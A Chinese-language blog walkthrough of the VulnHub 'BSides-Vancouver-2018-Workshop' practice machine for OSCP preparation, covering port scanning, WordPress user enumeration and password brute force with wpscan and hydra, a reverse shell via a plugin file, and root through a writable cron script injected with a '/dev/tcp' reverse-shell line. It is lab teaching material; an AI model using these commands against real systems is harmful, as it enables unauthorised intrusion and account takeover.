当前位置: 首页 > article >正文

OSCP备战-BSides-Vancouver-2018-Workshop靶机详细步骤

一、靶机介绍

靶机地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop%2C231/

靶机难度:中级(CTF)

靶机发布日期:2018年3月21日

靶机描述:

Boot2root挑战旨在创建一个安全的环境,您可以在该环境中对(故意)易受攻击的目标执行真实的渗透测试。

目标:得到root权限&找到flag.txt

作者:DXR嗯嗯呐

二、信息探测

1、目标IP发现:

得到IP:192.168.155.188

2、端口扫描

nmap -p-  --min-rate 1000 -T4 192.168.155.188

nmap -p21,22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.188

三、Getshell

端口扫描时发现

连接ftp:

最终找到:

保存下来

没有其他信息了,退出

拿去爆破一下ssh

很遗憾,不支持密码认证

回头又去爆了一下ftp,无果。只能看站点了

源码没有东西,进行路径扫描

dirsearch -u http://192.168.155.188/

访问得到:

又是wordpress,访问得到

没什么东西,继续扫描:

版本号:

权限有设置,只能看一些不重要的

登录页面:

Bp爆破呗:

只有john

密码不对,应该是字典太小了,就是这个思路,换个大字典应该可以

就是kali自带Bp老的线程太慢了,用wpscan弄一下

又看到admin,两个用户了

wpscan --url  http://192.168.155.188/backup_wordpress

枚举可能用户:

wpscan --url http://192.168.155.188/backup_wordpress/ --enumerate u

爆破密码:

wpscan --url http://192.168.155.188/backup_wordpress/ --passwords /usr/share/wordlists/rockyou.txt  --usernames john  --max-threads 100

得到john/enigma

拿去登录一下:

找到文件上传点:

找到自带反弹脚本:

改一下IP和端口

嗯不行

换回老地方:plugins(当然外观404也是很经典)

在这里找到:

点进去一路访问:

生成交互式命令行

python -c 'import pty; pty.spawn("/bin/bash")'

四、提权

内核提权

查看发行版:

12.04很常见了,存在内核提权的

searchsploit -m 37292.c

wget http://192.168.155.166:442/37292.c

很遗憾失败了

ssh连接su提权

Cat /etc/passwd

su john但是身份验证失败

保存一下:

hydra -L user1.txt -P /usr/share/wordlists/rockyou.txt -t 4 192.168.155.188 ssh

su直接提权

完成

定时任务

列出与系统定时目录相关的文件和配置:

ls -la /etc/cron*

echo ‘#!/bin/bash’ > cleanup

echo ‘ bash -i >& /dev/tcp/192.168.155.166/4444 0>&1’ >> cleanup

重开监听

等待获得root权限

题外话,贴一点tips

getshell后查看命令:

1、查看发行版:

      cat /etc/os-release

2、列出与系统定时目录相关的文件和配置:

      ls -la /etc/cron*

3、cat /etc/passwd  cat /etc/shadow

4、查看可以以root权限执行的命令

      sudo -l

5、查看可以以所有者身份执行的程序

      find / -type f -perm -4000 -user root 2>/dev/null

http://www.lryc.cn/news/2404971.html

相关文章:

  • PDF转Markdown/JSON软件MinerU最新1.3.12版整合包下载
  • Android第十三次面试总结基础
  • 【深入学习Linux】System V共享内存
  • 编程基础:执行流
  • 理解非结构化文档:将 Reducto 解析与 Elasticsearch 结合使用
  • 算法训练第十天
  • 2种官方方法关闭Windows防火墙
  • [面试精选] 0094. 二叉树的中序遍历
  • 股指期货期权交易规则是什么?
  • 学习笔记(23): 机器学习之数据预处理Pandas和转换成张量格式[1]
  • 2025年6月6日第一轮
  • 记一次运行spark报错
  • 12-Oracle 23ai Vector 使用ONNX模型生成向量嵌入
  • 2. 库的操作
  • pytorch 与 张量的处理
  • layer norm和 rms norm 对比
  • Java高级 | 【实验六】Springboot文件上传和下载
  • RKNN开发环境搭建1-基于Ubuntu 18.04系统使用Docker安装rknn-toolkit2
  • qt使用笔记二:main.cpp详解
  • VBA进度条ProgressForm1
  • 行为型设计模式之Interpreter(解释器)
  • 深入解析 CAS 操作
  • vue3+TS+eslint9配置
  • 【bug】Error: /undefinedfilename in (/tmp/ocrmypdf.io.9xfn1e3b/origin.pdf)
  • HarmonyOS5.0——CodeGenie:鸿蒙生态的AI编程革命​
  • 【Dv3Admin】系统视图字典管理API文件解析
  • 免费 SecureCRT8.3下载、安装、注册、使用与设置
  • Redis :String类型
  • 两种Https正向代理的实现原理
  • 第18节 Node.js Web 模块